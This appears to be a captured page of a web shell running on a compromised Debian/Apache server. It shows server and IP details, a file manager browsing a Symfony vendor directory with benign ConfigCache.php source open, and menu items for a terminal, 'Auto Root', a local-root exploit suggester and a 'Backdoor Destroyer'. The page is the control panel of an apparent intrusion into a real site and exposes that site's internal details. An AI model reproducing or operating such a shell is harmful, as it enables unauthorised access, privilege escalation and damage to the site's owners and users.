Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.217.117
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
v3.cesa.co.za /
vendor /
symfony /
config /
Delete
Unzip
Name
Size
Permission
Date
Action
Builder
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
Definition
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
Exception
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
Loader
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
Resource
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
Util
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
.htaccess
237
B
-r-xr-xr-x
2026-08-17 03:12
CHANGELOG.md
4.6
KB
-rwxrwxr-x
2026-02-24 17:34
ConfigCache.php
1.49
KB
-rwxrwxr-x
2026-02-24 17:34
ConfigCacheFactory.php
1.07
KB
-rwxrwxr-x
2026-02-24 17:34
ConfigCacheFactoryInterface.php
937
B
-rwxrwxr-x
2026-02-24 17:34
ConfigCacheInterface.php
1.24
KB
-rwxrwxr-x
2026-02-24 17:34
FileLocator.php
2.68
KB
-rwxrwxr-x
2026-02-24 17:34
FileLocatorInterface.php
1.1
KB
-rwxrwxr-x
2026-02-24 17:34
LICENSE
1.04
KB
-rwxrwxr-x
2026-02-24 17:34
README.md
596
B
-rwxrwxr-x
2026-02-24 17:34
ResourceCheckerConfigCache.php
5.49
KB
-rwxrwxr-x
2026-02-24 17:34
ResourceCheckerConfigCacheFactory.php
1.04
KB
-rwxrwxr-x
2026-02-24 17:34
ResourceCheckerInterface.php
1.2
KB
-rwxrwxr-x
2026-02-24 17:34
composer.json
1.2
KB
-rwxrwxr-x
2026-02-24 17:34
Save
Rename
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\Config; use Symfony\Component\Config\Resource\SelfCheckingResourceChecker; /** * ConfigCache caches arbitrary content in files on disk. * * When in debug mode, those metadata resources that implement * \Symfony\Component\Config\Resource\SelfCheckingResourceInterface will * be used to check cache freshness. * * @author Fabien Potencier <fabien@symfony.com> * @author Matthias Pigulla <mp@webfactory.de> */ class ConfigCache extends ResourceCheckerConfigCache { private bool $debug; /** * @param string $file The absolute cache path * @param bool $debug Whether debugging is enabled or not */ public function __construct(string $file, bool $debug) { $this->debug = $debug; $checkers = []; if (true === $this->debug) { $checkers = [new SelfCheckingResourceChecker()]; } parent::__construct($file, $checkers); } /** * Checks if the cache is still fresh. * * This implementation always returns true when debug is off and the * cache file exists. */ public function isFresh(): bool { if (!$this->debug && is_file($this->getPath())) { return true; } return parent::isFresh(); } }